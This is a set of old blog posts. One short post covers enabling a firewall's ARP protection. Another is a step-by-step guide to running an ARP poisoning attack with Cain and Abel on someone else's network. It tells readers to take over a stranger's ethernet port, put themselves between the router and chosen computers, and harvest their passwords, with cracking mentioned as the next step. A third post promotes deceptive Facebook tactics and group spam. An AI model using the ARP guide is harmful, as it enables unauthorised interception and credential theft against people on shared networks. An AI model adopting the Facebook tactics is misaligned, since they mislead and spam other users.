href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI-AjLC5IX55fml3OcSKF7EgcpLt4PG0LoTZmBVttF6aWqffTRVPhyphenhyphenGGHWU4HY2ENKaQe9ndc1iIeKJ0kSre_g5ZjKgA3CZ7PTgukZNsptqQeOZ_BaULUBsBhI-RJUEqOghhh3vnxFk80/s1600/firewall.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI-AjLC5IX55fml3OcSKF7EgcpLt4PG0LoTZmBVttF6aWqffTRVPhyphenhyphenGGHWU4HY2ENKaQe9ndc1iIeKJ0kSre_g5ZjKgA3CZ7PTgukZNsptqQeOZ_BaULUBsBhI-RJUEqOghhh3vnxFk80/s200/firewall.png" width="200" /></a></div>One of my blog's reader asked a question:<br />
<br />
<blockquote><b>How can I protect my <span class="IL_AD" id="IL_AD3">computer from</span> an ARP Poisoning Attack?</b></blockquote><br />
For those of you who do not know what an ARP Poisoning Attack is I suggest you reading my article on <a href="http://rayahari.blogspot.com/2010/08/how-to-implement-arp-poisoning-attack.html"><span class="Apple-style-span" style="color: #3d85c6;"><b>How to Implement an ARP Poisoning Attack?</b></span></a>.<br />
So I tested different software to see which one works the best to protect your computer from an ARP Poisoning attack I came across some excellent softwares but they were not free, so I thought not to share it and searched for a Free Alternative finally I came across a Free Firewall Which helps you successfully block ARP Poisoning attacks, but you have this Feature because it is disabled by default.<br />
<br />
<a href="" name="more"></a><br />
First of All Download Commodo Firewall from the link below:<br />
<b><a href="http://download.comodo.com/cis/download/installs/standalone/cfw_installer_x86.exe"><span class="Apple-style-span" style="color: #3d85c6;">Download Commodo Firewall</span></a></b><br />
<b><br />
</b><br />
Once you have downloaded and Installed it successfully.Click on Firewall at the top bar and then click <b>Advanced button</b> at the left pane. Go to <b>Attack Detection Settings</b> and check “<b>Protect the ARP Cache</b>”.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNXklXqyltO0-zBeUAhT0L4GRiybryBhiAz90myl0khNmmyhPpnA1AWjWzZfCHpNIGe75_7Sjcs0ph6UH5BV0qy4a844nixa7HDK-jqiLb2EfHuA8lJjdlZGRdnbeHIbuYBIcOJI2zaX4/s1600/comodo-protect-arp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNXklXqyltO0-zBeUAhT0L4GRiybryBhiAz90myl0khNmmyhPpnA1AWjWzZfCHpNIGe75_7Sjcs0ph6UH5BV0qy4a844nixa7HDK-jqiLb2EfHuA8lJjdlZGRdnbeHIbuYBIcOJI2zaX4/s400/comodo-protect-arp.png" width="370" /></a></div><br />
Hope this method helps you in protecting your self from ARP Poisoning attacks. I have posted more <span class="IL_AD" id="IL_AD1">Internet Security articles</span> in my <b>Security tips</b> section under category section. If you have any questions and queries to be answered feel free to ask me. <div style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"><br />
</div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-16744051882299549812010-08-12T12:12:00.000-07:002010-08-12T12:12:22.782-07:00How to implement an ARP poisoning attack<b><span class="Apple-style-span" style="color: #38761d;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">Skill level:Intermediate <span class="Apple-style-span" style="color: black; font-family: 'Times New Roman'; font-weight: normal;"><b><span class="Apple-style-span" style="color: #38761d;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">Sucess rate:60%</span></span></b></span></span></span></b><br />
<br />
<div style="line-height: 18px; margin: 0px 0px 15px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="line-height: normal;"><b><span class="Apple-style-span" style="font-size: x-large;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">The ARP poisoning attack:</span></span></b></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;">The concept behind this is simple. ARP is the protocol that maintains <span class="IL_AD" id="IL_AD1">network</span> devices tables up-to-date by associating an <span class="IL_AD" id="IL_AD6">IP address</span> with a <span class="IL_AD" id="IL_AD3">MAC address</span>. The problem with ARP is that it doesn’t really care about who answered, it will gladly update the tables from whoever says so. Most <span class="IL_AD" id="IL_AD5">of the time</span>, it won’t even ask. So the idea behind the attack, is to send the client an ARP answer saying “hey, I’m the gateway, send stuff to me” and a second ARP answer to the real gateway saying “hey there, I’m this guy, send me his stuff”. Then you just have to relay the packets between the victim and the gateway.Those schemas are more simply to understand</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;">In Linux, the rerouting can be done using the following iptables commands:</span></div><div style="line-height: 18px; margin: 0px 0px 15px; padding: 0px; text-align: center;"><blockquote><span style="margin: 0px; padding: 0px;">iptables -t nat -A PREROUTING -i <span style="margin: 0px; padding: 0px;"><interface></interface></span> -p tcp –dport <span style="margin: 0px; padding: 0px;"><port></port></span> -j REDIRECT –to-port </span></blockquote></div><div style="line-height: 18px; margin: 0px 0px 15px; padding: 0px; text-align: center;"><blockquote><span style="margin: 0px; padding: 0px;">iptables -t nat -D PREROUTING -i <span style="margin: 0px; padding: 0px;"><interface></interface></span> -p tcp –dport <span style="margin: 0px; padding: 0px;"><port></port></span> -j REDIRECT –to-port </span></blockquote><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><em style="margin: 0px; padding: 0px;"></em></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><em style="margin: 0px; padding: 0px;"></em></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><em style="margin: 0px; padding: 0px;"></em></span><br />
<em style="margin: 0px; padding: 0px;"></em><br />
<em style="margin: 0px; padding: 0px;"></em><br />
<em style="margin: 0px; padding: 0px;"><a href="" name="more"></a></em><em style="margin: 0px; padding: 0px;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span> </em></div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9T868Fg79YT8QfiIPZHoin3Ojd1xr3ZeunDC144X4wp1cHvD8vhwA_6cqrTBXrr-7wb5HLgXDAbApEAZhhyW5xSQ9FirHILylRBjprZ02xcBp3wPsdUSRzY89x6U8fJX4SX0FjzVRIPc/s1600-h/arp-poisoining-schema.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9T868Fg79YT8QfiIPZHoin3Ojd1xr3ZeunDC144X4wp1cHvD8vhwA_6cqrTBXrr-7wb5HLgXDAbApEAZhhyW5xSQ9FirHILylRBjprZ02xcBp3wPsdUSRzY89x6U8fJX4SX0FjzVRIPc/s320/arp-poisoining-schema.jpg" width="237" /></span></a><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="border-collapse: collapse; color: #333333; line-height: 18px;"></span></span><br />
<h3 style="line-height: 17px; margin: 10px 0px; padding-bottom: 5px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">ARP Spoofing/poising Animation</span></span></h3><div style="margin-bottom: 0.5em; margin-top: 0.5em;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">The attacker is constently sending false ARP messages to the victim causing it to update its ARP table. When you ready to send Ping, watch closley where the ping goes.</span></div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span> <br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span> <br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><embed height="700" src="http://www.osischool.com/elab/sharethis?tid=37" type="application/x-shockwave-flash" width="800"></embed></span><br />
<div style="line-height: 18px; margin: 0px 0px 15px; padding: 0px; text-align: justify;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">How to implement an ARP poisoning attack?</span></b><br />
<b><span class="Apple-style-span" style="font-weight: normal; line-height: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></b><br />
<b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></b><br />
<b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></b><br />
<b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></b><br />
<b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></b><br />
<b><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></b><br />
<br />
<br />
<b><b><div style="background-color: transparent; border-width: 0px; color: #555555; display: inline ! important; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important;"><strong style="background-color: transparent; border-width: 0px; margin: 0px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">What you will need:</span></span></strong></div></div></div></b></b></div></div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span><br />
<br />
<br />
<b><ul style="background-color: transparent; border-width: 0px; list-style-type: none; margin: 0px 0px 15px; outline-width: 0px; padding: 0px 0px 0px 30px; vertical-align: baseline;"><li style="background-color: transparent; border-width: 0px; list-style-type: circle; margin: 0px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">A laptop.</span></li>
<li style="background-color: transparent; border-width: 0px; list-style-type: circle; margin: 0px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">Cain and able. Download it from, </span><a href="http://www.oxid.it/index.html" rel="nofollow" style="background-color: transparent; border-width: 0px; color: #3088ff; margin: 0px; outline-width: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">www.oxid.it/index.html</span></a></li>
<li style="background-color: transparent; border-width: 0px; list-style-type: circle; margin: 0px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">A network to sniff.</span></li>
</ul><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><strong style="background-color: transparent; border-width: 0px; margin: 0px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">Now onto how to do this:</span></span></strong></div></div><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">1) Download and install cain and able.</span></span></div></div><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">2) Set your laptop up and steal an ethernet connection from a nearby computer on the network. Plug the Ethernet cable in. You are now connected. With no restrictions on what you can run.</span></span></div></div><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span id="more-496" style="background-color: transparent; border-width: 0px; margin: 0px; outline-width: 0px; padding: 0px; vertical-align: baseline;"></span></span></span></div></div><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">3) Start cain and able.</span></span></div></div><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">4) Now click on the sniffer tab. Now notice the two symbols – the one that looks the same as the one on the sniffer tab and the one that looks like a nuclear sign.</span></span></div></div><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">5) Mouse over them and they will tell you that one starts the sniffer and the other starts arp poisoning.</span></span></div></div><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">6) Now click on configure -> click on the arp tab and make sure that you are using your real ip and mac address, if you don’t you wont get any hosts or be able to arp poision.<br />
7) Now start the sniffer and press the blue plus sign. This will let you scan for hosts in your subnet.</span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"> </span><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><img alt="8)" class="wp-smiley" src="http://www.levoltz.com/wp-includes/images/smilies/icon_cool.gif" style="background-color: rgba(255, 255, 255, 0.686); border-top-style: none; margin: 0px; outline-width: 0px; padding: 0px; vertical-align: baseline;" /> Now go back to configure and select use a spoofed ip and mac address. Now type an ip from your sub net but the last bit must be numbers that are unused so the network doesn’t get confused.</span></span></div></div><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">9) Select all the hosts you find and right click and go resolve host name. Now try to find the router, it will usually stand out easily. The router probably wont have a name as well as being a different brand from everything else and have a really low or really high ip address so you should spot it easily.</span></span></div></div><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">10) Now click on the arp tab at the bottom of the sniffer window. Click on the top table part and click the blue plus sign again. This brings up a window that allows you to select the ip addresses that you want to arp poison the first one you select should be the router and in the second box select any computers you want to listen to.</span></span></div></div><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">11) Click ok. Click the start arp button. You are now listening between the router and as many computers as you selected.</span></span></div></div><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">12) Watch as the routed packets role in. Select the password tab at the bottom of the screen and watch the passwords appear.</span></span></div></div><div style="background-color: transparent; border-width: 0px; color: #555555; font: 16px/1.5em Georgia,serif; margin: 0px 0px 20px; outline-width: 0px; padding: 0px; vertical-align: baseline;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: medium;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">13) Any password hashes can be sent to the cracker and broken form there but that isn’t going to be covered in this article. I am sure you can work that out or may be I shall post it later.</span></span></div></div></b><div style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"><br />
</div>Tazhttp://www.blogger.com/profile/16923507242728566783noreply@blogger.com0tag:blogger.com,1999:blog-5938474543606888364.post-5081688279493576862010-08-11T04:13:00.000-07:002010-08-11T04:22:15.994-07:00Top 12 Facebook Marketing Hacks<div class="post"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTVZ5Y5KojkhwrbS4TYyIzz5nmsStDq1p9G9iL3-rQWCKO0-6g6LtWqJIp-IWxuBUdNJi8zSbrRDUqwLO-HoHr7sCw8mz1BIbmS3Av2QDOE5vAejzi-8H9ijv7c2wCvgcnmVyF3fkqLX8/s1600/group.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTVZ5Y5KojkhwrbS4TYyIzz5nmsStDq1p9G9iL3-rQWCKO0-6g6LtWqJIp-IWxuBUdNJi8zSbrRDUqwLO-HoHr7sCw8mz1BIbmS3Av2QDOE5vAejzi-8H9ijv7c2wCvgcnmVyF3fkqLX8/s320/group.JPG" /></a></div>Over the past week there has been a bunch of buzz about what essentially are Facebook marketing hacks; quick “guerilla” tactics that help boost exposure to your profile or brand. Whether you are a small business or a big business, there are some quick “tricks” that can instantly gain you more exposure. These Facebook marketing hacks are not encouraged by Facebook and ultimately, I would assume that Facebook will develop filters for people gaming the system.<br />
<h3>Facebook Marketing Hack 1: Tag Popular Friends in Photos</h3>This trick has been written about extensively over the past week. This Facebook hack is pretty straight forward. You simply upload a photo which has some sort of promotional value in addition to a photo description which can be used for promotional purposes. Proceed to tag your most influential friends (friends with the most contacts), and submit the photo. <br />
Facebook places a high priority on photo tagging when it comes to news feed stories so this is a great way for getting promotion. As I said before, this is gaming the system though and Facebook will inevitably develop tools to monitor this type of activity. If you abuse Facebook tagging, you may not only begin to receive warnings from Facebook that your Facebook account will be deactivated, but you could also anger your friends.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghto7w1O582Fw5989hWoL9tafCtMoXyntoqnwz4aR7XtYsubdToLKPt-ogB46Ymki0nTrQm8pUJOUX8r962MFtyWAKNtkuz_Fxt1_mzkkdeO9mtnxTiGWazh76-epszZIGtNU5FoyJhbM/s1600/tagging.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghto7w1O582Fw5989hWoL9tafCtMoXyntoqnwz4aR7XtYsubdToLKPt-ogB46Ymki0nTrQm8pUJOUX8r962MFtyWAKNtkuz_Fxt1_mzkkdeO9mtnxTiGWazh76-epszZIGtNU5FoyJhbM/s400/tagging.JPG" width="400" /></a></div><div style="text-align: center;"><br />
</div><span id="more-2407"></span><br />
<h3>Facebook Marketing Hack 2: Switch Your Relationship Status Regularly</h3>This has to be one of the more aggressive hacks that I’ve found. Remember, I’m not necessarily endorsing these tactics, I’m simply exposing the various Facebook hacks that exist. You’ve probably noticed that every time one of your friends gets out of a relationship, or decides to seal the deal you end up getting a notification in your newsfeed about their relationship change. <br />
That’s because Facebook places a high priority on relationship changes. These tend to be one of the less frequent activities within user profiles and as such they are prioritized to display whenever they take place. So if you are really aggressive about promoting yourself, go switch your relationship status and enjoy the countless clicks to your profile. <br />
If you decide to go this route, you may want to have a promotional story published within your personal feed so that visitors arriving at your profile have other content to interact with. <br />
<div style="text-align: center;"><img alt="-Relationship Change Screenshot-" height="149" src="http://www.allfacebook.com/images/relationship-change.gif" width="503" /> </div><h3>Facebook Marketing Hack 3: Join As Many Events as Possible</h3>Facebook events receive a high priority for the news feed, especially when multiple people within a given network of friends RSVP to attend. The more events you RSVP to the better and eventually your friends will begin receiving notifications that you’ve RSVPed and will also join. This is a secondary Facebook marketing hack as individuals are not directly driven to your profile but instead another event.<br />
You are acting as a resource for your friends when you RSVP though and ultimately, the more often they see events that you’ve RSVPed to, the more often they’ll think of you as an event resource. This is a basic marketing strategy but it’s one that works. Some people are extremely aggressive with this and RSVP to every event regardless of whether or not they’ll be attending.<br />
The end result is that people see you attending the event and occasionally click through to your profile, in turn increasing your exposure. It’s indirect marketing, but it works.<br />
<div style="text-align: center;"><img alt="-Facebook Event Newsfeed Story Screenshot-" height="216" src="http://www.allfacebook.com/images/fb-event-story.gif" width="499" /> </div><h3>Facebook Marketing Hack 4: Import Blog Posts and Tag Friends in Notes</h3>If you are trying to promote a brand or your own company and you have a blog, Facebook Notes should be your best friend. Facebook currently enables users to import one RSS feed from a blog or general news site and then each of those articles are published as Facebook notes automatically. To edit your settings go to the <a href="http://www.facebook.com/editnotes.php">notes settings page</a>.<br />
Don’t stop at just configuring your notes to import a feed though. Once you make a post and it’s imported to Facebook, head on over to that note and tag influential friends in that article. I’ve seen this work regularly and if friends comment on the article, it increases the odds that the note will show up in the news feed. Don’t over use this though!<br />
If you start tagging friends in articles regularly, you are going to experience diminishing returns. First of all you’ll turn into the boy that cried wolf in that your friends will stop checking everytime they are tagged in a note. Additionally, Facebook could start ranking your notes lower for the news feed.<br />
<div style="text-align: center;"><img alt="-Facebook Notes Tagging Screenshot-" height="140" src="http://www.allfacebook.com/images/notes-tag.gif" width="520" /> </div><h3>Facebook Marketing Hack 5: Wish Everybody a Happy Birthday!</h3>This is less of a hack and more of a good activity to get in the habit of. Whether or not you are using Facebook to do this, you should be wishing everybody you know a happy birthday. Facebook has done most of the work for you, by tracking all of your contacts’ birthdays, they even recently added <a href="http://www.allfacebook.com/2008/11/happy-birthday-from-facebook/">birthday email notifications</a>.<br />
If you aren’t into wishing people a happy birthday just to be a good friend, there is also the promotional side of doing so. Wall posts are also optimized to show up in users’ Facebook news feeds. That means not only do you get to wish someone a happy birthday but there is also a chance that other people will see it! <br />
Talk about a worthwhile activity! You get to build your relationship as well as promote yourself or your company. Personally, I also like to send my close friends a text message, a call, or take them out for a drink, but posting a Facebook wall post also can never hurt!<br />
<div style="text-align: center;"><img alt="-Facebook Birthday Reminders Screenshot-" height="123" src="http://www.allfacebook.com/images/birthday-reminder.gif" width="333" /> </div><h3>Facebook Marketing Hack 6: Engage in Many Poke Wars</h3>Personally, I’m not one for poking often. With girls it tens to be more of a way to flirt or say “Hi!”, whereas with guys it’s a way to get their attention. Whatever reason you are using it for, it’s a good idea to poke more often. Why? Well it gets more people checking you out and it also may result in more promotional activities such as wall posts and other actions.<br />
Make sure not to make people annoyed though. Ultimately, even annoying them can be good because it incentivizes them to take a public action. Alternatively they could remove you as a friend! This requires that you know when to stop but I’ll assume that you have basic personal communication skills and can figure that part out.<br />
<div style="text-align: center;"><img alt="-Facebook Poke Wars Screenshot-" height="260" src="http://www.allfacebook.com/images/fb-poke-wars.gif" width="338" /> </div><h3>Facebook Marketing Hack 7: Switch Your Birthday Regularly</h3>This is a pretty dirty tactic and I personally have never employed this one. Given that there are many other people that take advantage of the birthday notifications, you can get a fair amount of attention by switching your birth date around. This is flat out misleading people that don’t know you well though and probably not the best tactic to use with them.<br />
This article isn’t about what’s right though, it’s about how to get people’s attention and build buzz for yourself or for your company. This is definitely one way to do it. Honestly, I don’t think that misleading your friends or potential customers is the best way to build buzz, but I’ll leave that decision up to you.<br />
<h3>Facebook Marketing Hack 8: Re-Post Fan Pages Previously Created</h3>Creating pages is a must do for any business. If you don’t know about Facebook Pages, go <a href="http://www.facebook.com/business/?pages">check them out</a>. This list isn’t everything about Facebook marketing, simply what the top 10 best Facebook marketing hacks are. Once you know how to create a page and get people registered, you should experience an initial surge (if you’ve done things right). <br />
Following that initial surge there tends to be a lull and many struggle to make it through that lull and the Facebook Page tends to die off. There are a number of ways to get through this lull. The first one (and the one Facebook would like you to take advantage of) is Facebook ads. I’ve used Facebook Ads extremely well for one of my pages. <br />
I highly recommend trying out Facebook Ads but there are a few free methods of promoting pages as well. The most effective tends to be reposting your page. As it happens, when you repost a page, you occasionally get the page reposted in friends’ news feeds. This is based on a number of factors that I can only guess about but, reposting one of the pages you want to attract new members to is never a bad idea.<br />
<a href="http://www.facebook.com/pages/Free-Emails/150014471681117?ref=search">Free Emails</a> <br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijkn3PXYrm4YFn6_TS8sXrwFKsot8jLs-j5e1me4wxRUIsuEp36-ijIiZ57LynIGlTEF6Vct06UkmagZ22rNCnK-igXd8Zef01ofYPR_WxPdO0LIos9zKGyN_fuMJ5ADte0o-SFRIh4Rk/s1600/FAn+page+blog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijkn3PXYrm4YFn6_TS8sXrwFKsot8jLs-j5e1me4wxRUIsuEp36-ijIiZ57LynIGlTEF6Vct06UkmagZ22rNCnK-igXd8Zef01ofYPR_WxPdO0LIos9zKGyN_fuMJ5ADte0o-SFRIh4Rk/s320/FAn+page+blog.jpg" /></a></div><br />
<a href="http://www.facebook.com/pages/Free-Emails/150014471681117?ref=search"></a><br />
<div style="text-align: center;"></div><h3>Facebook Marketing Hack 9: Post Comments on Fast Growing Groups</h3>This is a killer method and it’s one of the reasons that you see so much spam on Facebook walls. Fast growing groups as well as newly posted events with large guest lists are great targets for posting content. There are two types of things to post: relevant comments and links to pages. The reason for posting relevant comments is that it means you have something valuable to add to the conversation.<br />
People tend to click on your profile if you add something valuable to the conversation. Extremely popular groups that are shooting for large memberships and have momentum are great places to place links to your site as well. I’ve seen links on these groups result in thousands of visits to a site. Personally, I don’t spend much time posting on walls but I’ve seen it work.<br />
If you post a link on a group or an event, make sure the link is relevant as well. Posting irrelevant links may get you some traffic but the value of that traffic is substantially reduced when it’s not relevant. Additionally, Facebook could ban you for over posting links as it eventually crosses the line in to “spam”. Some groups even enable the posting of rich content. Post attachments with links to sites as often as you can if the events enable it. This will always drive quality traffic.<br />
<div style="text-align: center;"><img alt="-Posted Items Screenshot-" height="305" src="http://www.allfacebook.com/images/posted-items.gif" width="520" /> </div><h3>Facebook Marketing Hack 10: Mastering Facebook Event Marketing</h3>Events are one of the best platforms for marketing on Facebook. I would go so far as to suggest that the Facebook events application has transformed the event industry. You can start an event and if properly promoted hundreds or thousands of people will end up registering for the event as it’s virally distributed throughout the social graph.<br />
<b>Invite Influencers</b><br />
The first step in mastering marketing via Facebook events is to attract the most influential people to your event. Honestly, most promotion on Facebook involves the influencers, or central nodes in our social graph as their news feed “stories” tend to have the broadest reach.<br />
<b>Get Attractive People</b><br />
I have never seen events explode like the ones that have a ton of attractive people registered to attend. Whether you like it or not, attractive people are called “attractive” for a reason. They will draw tons of people to your event. One of the first things people do when they view an event is check out the guest list. <br />
If the event is all guys nobody wants to go. This is basic party promotion tactics and you should be using them on Facebook even for professional events!<br />
<b>The Power of Maybe</b><br />
One last important component of Facebook events is that when you invite all your friends to them, and other people invite their friends, you can message all attendees even if they haven’t RSVPed. Unless a user comes and specifically enters that they will not be attending, they will receive your messages. <br />
<div style="text-align: center;"><img alt="-Facebook Events Screenshot-" height="299" src="http://www.allfacebook.com/images/fb-events.gif" width="520" /> </div><h3>Facebook Marketing Hack 11: Import Your Email Contacts Into Facebook</h3>This is one of the most simple ways for instantly boosting your contacts on Facebook. Frequently we forget who all of our contacts are so thankfully, Facebook has simplified the process for seeking out existing contacts. On Facebook’s <a href="http://www.facebook.com/findfriends.php?ref=friends">find friends</a> page, there is the option to enter your email address and Facebook will automatically import those contacts to see which ones are already registered for Facebook.<br />
In addition to displaying which direct email contacts you aren’t connected on Facebook to yet, the service updates Facebook’s database with other potential contacts you might know. As such, you don’t need to add everyone as a friend to receive a benefit from importing your email. One other trick is to import external email lists into your gmail (or email provider of your choice) contacts and then import those contacts into Facebook. <br />
You can use this model to discover a variety of new contacts that may only be a degree or two away from you. Given that one of the keys of Facebook marketing is to have a large network of contacts, the Facebook contact import feature will help you jump ahead rapidly in your quest to master Facebook marketing. <br />
<div style="text-align: center;"><img alt="-Find People You Email Screenshot-" height="178" src="http://www.allfacebook.com/images/find-friends.gif" width="520" /> </div><h3>Facebook Marketing Hack 12: Sync Your Twitter With Facebook</h3>Many people prefer not to use Twitter but those that do, have rapidly realized the potential marketing power of Twitter. If you have a large number of followers you also begin to realize the power of using your social network as a resource. No matter where you are in your Twitter experience, linking your Twitter to Facebook makes it easier to keep everybody in your network up to date on your latest happenings. <br />
The more that you update your status, the more likely that your friends will take notice of you on Facebook. This builds your contacts’ awareness of your activities and if properly leveraged it can also boost traffic to your company’s website. I choose to automatically post each article that I write directly to Twitter. This is not for everybody as some people are concerned about overloading their contacts with information and scaring them off.<br />
Personally, I’ve had a net increase in followers by posting about my articles so I don’t feel too guilty about doing this. For those that vow never to get one Twitter, you can still update your status regularly, as it will have similar results. If you aren’t against Twitter, then simply install the <a href="http://www.facebook.com/apps/application.php?id=2231777543">Twitter Facebook application</a> and get your status and Twitter account synced. <br />
